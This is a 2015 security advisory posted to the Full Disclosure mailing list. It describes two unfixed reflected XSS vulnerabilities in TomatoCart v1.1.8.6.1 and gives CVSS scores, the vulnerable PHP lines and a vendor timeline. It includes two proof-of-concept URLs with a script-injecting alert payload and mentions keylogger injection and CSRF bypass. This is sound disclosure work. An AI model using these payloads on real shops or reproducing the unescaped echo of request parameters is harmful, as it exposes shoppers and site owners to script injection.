[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0LgL1E-1aikYr1tG0-00nlj2@mrelayeu.kundenserver.de>
Date: Fri, 13 Nov 2015 16:53:00 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] TomatoCart v1.1.8.6.1: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: TomatoCart v1.1.8.6.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@...atocart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With
this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in the case of TomatoCart may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/info/faqs.php:70
if(question.getParent().id == 'faq<?php echo $_GET['faqs_id']; ?>') {
question.getElement('i').set('class', 'icon-minus');
question.getNext().setStyle('display', '');
}
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/checkout/checkout.php:182
view: '<?php echo $_GET['view']; ?>',
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists